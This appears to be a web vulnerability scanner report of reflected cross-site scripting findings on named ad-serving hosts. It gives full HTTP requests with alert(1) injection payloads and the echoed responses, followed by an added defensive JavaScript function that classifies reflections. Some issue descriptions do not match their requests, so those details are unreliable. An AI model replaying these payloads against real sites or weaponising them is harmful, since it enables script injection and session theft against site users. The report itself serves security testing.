GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w1d3a0"-alert(1)-"cc96eba19d7&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... 5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w1d3a0"-alert(1)-"cc96eba19d7&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31220"-alert(1)-"5c310f7490c was submitted in the sz parameter. This input was echoed unmodified in the application's response. In the request below the payload sits immediately after sa=l inside the click= URL that is carried in the request path; the sz=300x250 segment itself is unchanged.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l31220"-alert(1)-"5c310f7490c&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:26:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/f/1fe/%2a/c%3B232704189%3B1-0%3B0%3B50545246%3B4307-300/250%3B40436189/40453976/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l31220"-alert(1)-"5c310f7490c&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5u ...[SNIP]...
1.21. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N3285.msn-dm/B2343920.67
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3d94"-alert(1)-"3cf86d08147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=104579515?click=http://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=&e3d94"-alert(1)-"3cf86d08147=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/197075234/direct;;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 21:52:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4153
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... .net/click%3Bh%3Dv8/3aa2/f/6b/%2a/u%3B222980277%3B4-0%3B0%3B25708763%3B4307-300/250%3B40308306/40326093/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=&e3d94"-alert(1)-"3cf86d08147=1https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D25708763-222980277-40326093"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW = 3 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2487d"-alert(1)-"2c5b6b5daa5 was submitted in the sz parameter. This input was echoed unmodified in the application's response. In the request below the payload is appended to the end of the click= value (after href=); the sz=300x250 segment itself is unchanged.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=104579515?click=http://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=2487d"-alert(1)-"2c5b6b5daa5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/197075234/direct;;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 21:52:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4163
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... k.net/click%3Bh%3Dv8/3aa2/7/68/%2a/p%3B222980277%3B2-0%3B0%3B25708763%3B4307-300/250%3B40114169/40131956/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=2487d"-alert(1)-"2c5b6b5daa5https://insurance.lowermybills.com/auto/?sourceid=25708763-222980277-40131956"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW = 300; var winH ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f361"><script>alert(1)</script>7e001703d00 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/dmd.ehow/computers6f361"><script>alert(1)</script>7e001703d00;cat=computersoftware;scat=;sscat=;art=;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=1;rsi=;tile=3;sz=300x250;ord=4760230283606905? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 593
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- BEGIN STANDARD TAG - 300 x 250 - - DO NOT MODIFY --> <SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=computers6f361"><script>alert(1)</script>7e001703d00&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/h%3B228957569%3B0-0%3B0%3B45373372%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c21"><script>alert(1)</script>57155bc0307 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/dmd.ehow/homepagee1c21"><script>alert(1)</script>57155bc0307;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:28:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 592
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- BEGIN STANDARD TAG - 300 x 250 - - DO NOT MODIFY --> <SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepagee1c21"><script>alert(1)</script>57155bc0307&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/h%3B228957569%3B0-0%3B0%3B45373372%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f"> ...[SNIP]...
The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97345'-alert(1)-'e55a08937c8 was submitted in the Z parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=160x60097345'-alert(1)-'e55a08937c8&s=429613&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:17:57 GMT
Content-Length: 411
Connection: close
The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6cd7'-alert(1)-'948355e44c0 was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=160x600&s=429613d6cd7'-alert(1)-'948355e44c0&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:17:57 GMT
Content-Length: 411
Connection: close
The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e920'-alert(1)-'fcb38195981 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=160x6008e920'-alert(1)-'fcb38195981&section=429613 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 641
Connection: close
The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b92"><script>alert(1)</script>9e1c2d8085e was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=160x600f9b92"><script>alert(1)</script>9e1c2d8085e&section=429613 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 711
Connection: close
The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f47e8'-alert(1)-'64ed47f711b was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=160x600&section=429613f47e8'-alert(1)-'64ed47f711b HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 641
Connection: close
The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f92b8"><script>alert(1)</script>05d28b2545d was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=160x600&section=429613f92b8"><script>alert(1)</script>05d28b2545d HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 711
Connection: close
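Before acting on a report like this one, each finding is normally re-checked: the request is re-issued and the body is inspected to confirm that the probe came back verbatim inside the context the issue detail names (a double-quoted JavaScript string, a double-quoted attribute, and so on). The function below does the offline half of that check. It is an added example and not part of the scanner report: it takes a captured response body plus the canary (random prefix, metacharacter probe, random suffix, which is exactly how every payload above is built), finds what came back between prefix and suffix, reports whether the probe survived unmodified, and classifies the syntactic context it landed in. The sample bodies are constructed excerpts of the ad.doubleclick.net /adi/N3285.msn-dm/B2343920.67 and /adi/dmd.ehow responses shown on this page, trimmed to the sink; the variable name clickTag in the first sample is an assumption (the report elides it with ...[SNIP]...), and the third sample is the first one edited by hand to look like a fixed response. Function and constant names are mine.

```javascript
'use strict';
// Offline half of re-checking a reflected-XSS finding: given a captured response body
// and the injected canary (random prefix + metacharacter probe + random suffix, the
// shape of every payload in this report), confirm the reflection, say whether the probe
// survived unmodified, and classify the syntactic context it landed in.
// Added example, not part of the scanner report. Sample bodies are constructed excerpts
// of responses shown on this page, trimmed to the sink; the variable name clickTag in
// the first sample is assumed (the report elides it with ...[SNIP]...).

function escapeRe(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Locate prefix...suffix in the body; return where the echoed probe starts and what it became.
function findCanary(body, prefix, suffix) {
  const re = new RegExp(escapeRe(prefix) + '([\\s\\S]{0,80}?)' + escapeRe(suffix));
  const m = re.exec(body);
  return m ? { index: m.index + prefix.length, echoed: m[1] } : null;
}

// Which string delimiter (if any) is still open at the end of a JavaScript fragment.
// Skips comments and backslash escapes; regex and template literals are not modelled.
function openJsQuote(js) {
  let quote = null;
  for (let i = 0; i < js.length; i++) {
    const c = js[i];
    if (quote) {
      if (c === '\\') i++;                     // escaped character, whatever it is
      else if (c === quote) quote = null;
    } else if (c === '/' && js[i + 1] === '*') {
      i = js.indexOf('*/', i + 2);
      if (i < 0) break;
      i++;
    } else if (c === '/' && js[i + 1] === '/') {
      i = js.indexOf('\n', i);
      if (i < 0) break;
    } else if (c === '"' || c === "'") {
      quote = c;
    }
  }
  return quote;
}

// Which attribute quote (if any) is still open at the end of a start-tag fragment.
function openAttrQuote(tag) {
  let quote = null;
  for (const c of tag) {
    if (quote) { if (c === quote) quote = null; }
    else if (c === '"' || c === "'") quote = c;
  }
  return quote;
}

function classifyContext(body, index) {
  const before = body.slice(0, index);
  const lower = before.toLowerCase();
  const open = lower.lastIndexOf('<script');
  if (open !== -1 && open > lower.lastIndexOf('</script')) {
    const codeStart = before.indexOf('>', open) + 1;
    if (codeStart > 0) {                       // inside the script body, not its start tag
      return { context: 'script', quote: openJsQuote(before.slice(codeStart)) };
    }
  }
  const lt = before.lastIndexOf('<');
  if (lt > before.lastIndexOf('>')) {          // inside a tag
    return { context: 'attribute', quote: openAttrQuote(before.slice(lt)) };
  }
  return { context: 'html-text', quote: null };
}

function triage(body, canary) {
  const hit = findCanary(body, canary.prefix, canary.suffix);
  if (!hit) return { reflected: false };
  const { context, quote } = classifyContext(body, hit.index);
  const unmodified = hit.echoed === canary.probe;
  // A verbatim echo that carries the delimiter closing the enclosing string or attribute
  // (or a '<' in plain text) is what turns a reflection into script execution.
  const delimiterHit = quote === null || canary.probe.includes(quote);
  const breakout = unmodified && (context === 'html-text' ? canary.probe.includes('<') : delimiterHit);
  return { reflected: true, unmodified, echoed: hit.echoed, context, quote, breakout };
}

// Constructed sample: the /adi/N3285.msn-dm/B2343920.67 response above, where the click
// URL is written into escape("...") inside the ad's script block.
const SCRIPT_SINK =
  '<html><head><title>Advertisement</title></head><body><script type="text/javascript">' +
  'var clickTag = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/f/6b/%2a/u%3B222980277%3B%7Esscs%3D%3f' +
  'http://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=&e3d94"-alert(1)-"3cf86d08147=1' +
  'https%3a%2f%2finsurance.lowermybills.com/auto/"); var wmode = "opaque";</script></body></html>';

// Constructed sample: the /adi/dmd.ehow response above, where the site code is written
// into the SRC attribute of a script tag.
const ATTR_SINK =
  '<html><body><!-- BEGIN STANDARD TAG - 300 x 250 - - DO NOT MODIFY -->' +
  '<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661' +
  '&site_code=computers6f361"><script>alert(1)</script>7e001703d00&section_code="></SCRIPT></body></html>';

// Constructed sample: what a fixed version of the first response should look like.
const FIXED_SINK = SCRIPT_SINK.replace('e3d94"-alert(1)-"3cf86d08147', 'e3d94\\"-alert(1)-\\"3cf86d08147');

const DOUBLECLICK_CANARY = { prefix: 'e3d94', probe: '"-alert(1)-"', suffix: '3cf86d08147' };
const EHOW_CANARY = { prefix: '6f361', probe: '"><script>alert(1)</script>', suffix: '7e001703d00' };

if (typeof require !== 'undefined' && require.main === module) {
  console.log(triage(SCRIPT_SINK, DOUBLECLICK_CANARY));   // script, quote ", breakout true
  console.log(triage(ATTR_SINK, EHOW_CANARY));            // attribute, quote ", breakout true
  console.log(triage(FIXED_SINK, DOUBLECLICK_CANARY));    // reflected but escaped, breakout false
}
```

The context classifier is deliberately shallow (it does not model regex or template literals, and treats the last unterminated <script as the governing block), which is enough to confirm or reject the report's "JavaScript string in double quotes" and "HTML attribute in double quotes" claims on bodies like these; anything it classifies as html-text or as an unexpected quote deserves a manual look rather than an automatic verdict.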
1.31. http://ad.reduxmedia.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.reduxmedia.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc2b"-alert(1)-"605cd6b88a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=120x600&section=681714&6cc2b"-alert(1)-"605cd6b88a5=1 HTTP/1.1
Host: ad.reduxmedia.com
Accept: */*
Accept-Language: en
